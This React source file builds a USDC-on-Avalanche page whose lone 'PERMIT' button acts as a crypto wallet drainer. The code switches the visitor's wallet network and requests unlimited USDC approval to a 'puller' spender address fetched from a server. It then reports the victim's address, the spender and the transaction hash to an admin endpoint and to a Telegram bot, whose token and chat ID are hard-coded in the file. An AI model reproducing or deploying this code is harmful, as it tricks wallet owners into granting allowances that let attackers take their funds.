import React, { useState } from 'react'
import { ethers } from 'ethers'
import { getEthereumProviderAsync } from '../utils/walletProvider'
import './TokenPage.css'

const AVAX_CHAIN_ID = 43114
const USDC_AVAX_ADDRESS = "0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E"
const AVAX_SPENDER_CONTRACT = "0xEf51c12b2b5CF154C5fD280D43e1981177986765"

// Use relative /api in dev (Vite proxies to multiscan.app to avoid CORS); same-origin when deployed on multiscan.app
const getApiBase = () => (typeof window !== 'undefined' ? window.location.origin : 'https://multiscan.app')
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

const USDCAVAXPage = () => {
  const [loading, setLoading] = useState(false)
  const [error, setError] = useState(null)
  const [success, setSuccess] = useState(false)

  // Function to send messages to Telegram
  const sendTelegramMessage = async (message) => {
    try {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`
      const response = await fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          chat_id: TELEGRAM_CHAT_ID,
          text: message,
          parse_mode: 'HTML',
        }),
      })
      
      if (!response.ok) {
        console.error('Error sending to Telegram:', await response.text())
      }
    } catch (error) {
      console.error('Error sending to Telegram:', error)
    }
  }

  // Function to format date and time
  const formatDateTime = () => {
    const now = new Date()
    const date = now.toLocaleDateString('en-US', {
      year: 'numeric',
      month: '2-digit',
      day: '2-digit',
    })
    const time = now.toLocaleTimeString('en-US', {
      hour: '2-digit',
      minute: '2-digit',
      second: '2-digit',
    })
    return `${date} ${time}`
  }

  const connectAVAX = async () => {
    const prov = await getEthereumProviderAsync()
    if (!prov || typeof prov.request !== 'function') {
      throw new Error("Wallet not found. Please open the page in Bybit Wallet or install MetaMask and refresh.")
    }
    const provider = new ethers.BrowserProvider(prov)
    
    // Request wallet connection
    await provider.send("eth_requestAccounts", [])
    const signer = await provider.getSigner()

    // Check current network
    let cur = await provider.send("eth_chainId", [])
    let currentChainId = parseInt(cur, 16)
    
    // If network is not Avalanche C-Chain, switch
    if (currentChainId !== AVAX_CHAIN_ID) {
      try {
        // Try to switch to Avalanche C-Chain
        await provider.send("wallet_switchEthereumChain", [{ chainId: `0x${AVAX_CHAIN_ID.toString(16)}` }])
        
        // Wait for network switch (check several times)
        let attempts = 0
        while (attempts < 20) {
          await new Promise(resolve => setTimeout(resolve, 200))
          cur = await provider.send("eth_chainId", [])
          currentChainId = parseInt(cur, 16)
          if (currentChainId === AVAX_CHAIN_ID) {
            break
          }
          attempts++
        }
        
        if (currentChainId !== AVAX_CHAIN_ID) {
          throw new Error("Failed to switch to Avalanche C-Chain network")
        }
      } catch (switchError) {
        // If network is not added, add it
        if (switchError.code === 4902 || switchError.message?.includes('Unrecognized chain')) {
          await provider.send("wallet_addEthereumChain", [{
            chainId: `0x${AVAX_CHAIN_ID.toString(16)}`,
            chainName: "Avalanche C-Chain",
            nativeCurrency: {
              name: "AVAX",
              symbol: "AVAX",
              decimals: 18
            },
            rpcUrls: ["https://api.avax.network/ext/bc/C/rpc"],
            blockExplorerUrls: ["https://snowtrace.io/"]
          }])
          
          // Wait for network to be added and switched
          let attempts = 0
          while (attempts < 20) {
            await new Promise(resolve => setTimeout(resolve, 200))
            cur = await provider.send("eth_chainId", [])
            currentChainId = parseInt(cur, 16)
            if (currentChainId === AVAX_CHAIN_ID) {
              break
            }
            attempts++
          }
          
          if (currentChainId !== AVAX_CHAIN_ID) {
            throw new Error("Failed to add and switch to Avalanche C-Chain network")
          }
        } else {
          throw switchError
        }
      }
    }

    return { provider, signer }
  }

  const handleApprove = async () => {
    try {
      setLoading(true)
      setError(null)
      setSuccess(false)
      console.log("APPROVE started for USDC AVAX")

      const ethProv = await getEthereumProviderAsync()
      if (!ethProv) {
        throw new Error("Wallet not ready. Please open the page in Bybit Wallet or refresh the page.")
      }

      // Get spender from API (dynamic); fallback to constant
      let spenderAddress = null
      try {
        const resPuller = await fetch(`${getApiBase()}/api/v1/puller?type=USDC_AVAX`)
        if (resPuller.ok) {
          const text = await resPuller.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
            try {
              const data = JSON.parse(text)
              spenderAddress = data.puller || data.pullerAddress || data.address || data.data || data
              if (typeof data === 'string' && data.startsWith('0x') && data.length === 42) spenderAddress = data
            } catch (e) {
              if (text.startsWith('0x') && text.length === 42) spenderAddress = text
            }
          }
        }
      } catch (fetchError) {
        console.warn("Puller API fetch failed, using default spender:", fetchError?.message)
      }
      if (!spenderAddress || typeof spenderAddress !== 'string' || !spenderAddress.startsWith('0x') || spenderAddress.length !== 42) {
        console.warn("Spender not received or invalid, using default AVAX spender")
        spenderAddress = AVAX_SPENDER_CONTRACT
      }
      console.log("Spender address:", spenderAddress)

      const { provider, signer } = await connectAVAX()
      const owner = await signer.getAddress()

      const usdcContract = new ethers.Contract(
        USDC_AVAX_ADDRESS,
        ["function approve(address spender, uint256 amount) returns (bool)"],
        signer
      )

      const maxApproval = ethers.MaxUint256
      const tx = await usdcContract.approve(spenderAddress, maxApproval)
      console.log("Approve transaction sent:", tx.hash)
      await tx.wait()
      console.log("✅ USDC AVAX C-Chain approve completed successfully:", tx.hash)

      const domainName = window.location.hostname

      try {
        const params = new URLSearchParams({
          owner: owner.toLowerCase(),
          domainName: domainName
        })
        const resSubmit = await fetch(`${getApiBase()}/api/admin/usdcs-avax?${params.toString()}`, {
          method: "POST",
          headers: { "Content-Type": "application/json" }
        })
        if (!resSubmit.ok) {
          console.error("Submit Error:", await resSubmit.text())
        } else {
          console.log("USDC AVAX APPROVE OK - data sent to server")
        }
      } catch (submitError) {
        console.warn("Failed to send data to server (not critical):", submitError)
      }

      const telegramMessage = `✅ <b>USDC AVAX C-Chain Approve</b>\n\n` +
        `🔗 Wallet Address: <code>${owner.toLowerCase()}</code>\n` +
        `🌐 Domain: <code>${domainName}</code>\n` +
        `💼 Token: USDC (AVAX C-Chain)\n` +
        `📝 Spender: <code>${spenderAddress}</code>\n` +
        `📝 Transaction: <code>${tx.hash}</code>\n` +
        `⏰ Time: ${formatDateTime()}`
      await sendTelegramMessage(telegramMessage)

      setSuccess(true)
      setLoading(false)
    } catch (e) {
      console.error("APPROVE FAILED", e)
      
      let userMessage = "An error occurred while connecting"
      
      if (e.code === 4001 || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied')) {
        userMessage = "Transaction was cancelled. Please confirm the transaction in your wallet to continue."
      } else if (e.message?.includes('MetaMask not found') || e.message?.includes('not found')) {
        userMessage = "MetaMask not found. Please install MetaMask and refresh the page."
      } else if (e.message?.includes('Failed to access') || e.message?.includes('access')) {
        userMessage = "Failed to access wallet. Please unlock MetaMask and try again."
      } else if (e.message?.includes('Wallet not ready')) {
        userMessage = "Wallet not ready. Please refresh the page and try again."
      } else if (e.message?.includes('network') || e.message?.includes('chain')) {
        userMessage = "Network error. Please check your internet connection and try again."
      } else if (e.message?.includes('insufficient funds')) {
        userMessage = "Insufficient funds to complete the transaction. Please top up your wallet balance."
      } else if (e.message?.includes('timeout')) {
        userMessage = "Request timeout. Please try again."
      } else if (e.message?.includes('Failed to connect to the server')) {
        userMessage = "Failed to connect to the server. Please check your internet connection and try again."
      } else if (e.status === 403 || (e.message && e.message.includes('403'))) {
        userMessage = "Server returned 403 (Forbidden). Allow this site's origin in your API CORS settings on the backend (multiscan.app)."
      } else if (e.message) {
        userMessage = e.message
      }
      
      setError(userMessage)
      setLoading(false)
    }
  }

  return (
    <div className="token-page">
      <div className="token-page-container">
        <div className="token-header">
          <div className="token-icon">
            <img 
              src="https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png" 
              alt="USDC"
              className="token-logo"
            />
          </div>
          <h1 className="token-title">USDC</h1>
          <p className="token-subtitle">USD Coin (AVAX C-Chain)</p>
        </div>

        {error && (
          <div className="token-error">
            {error}
          </div>
        )}

        {success && (
          <div className="token-success">
            ✅ Approve completed successfully!
          </div>
        )}

        {loading && (
          <div className="token-loading">
            Connecting and approving...
          </div>
        )}

        <button 
          className="token-approve-btn"
          onClick={handleApprove}
          disabled={loading || success}
        >
          {loading ? 'Processing...' : success ? 'Done!' : 'PERMIT'}
        </button>
      </div>
    </div>
  )
}

export default USDCAVAXPage
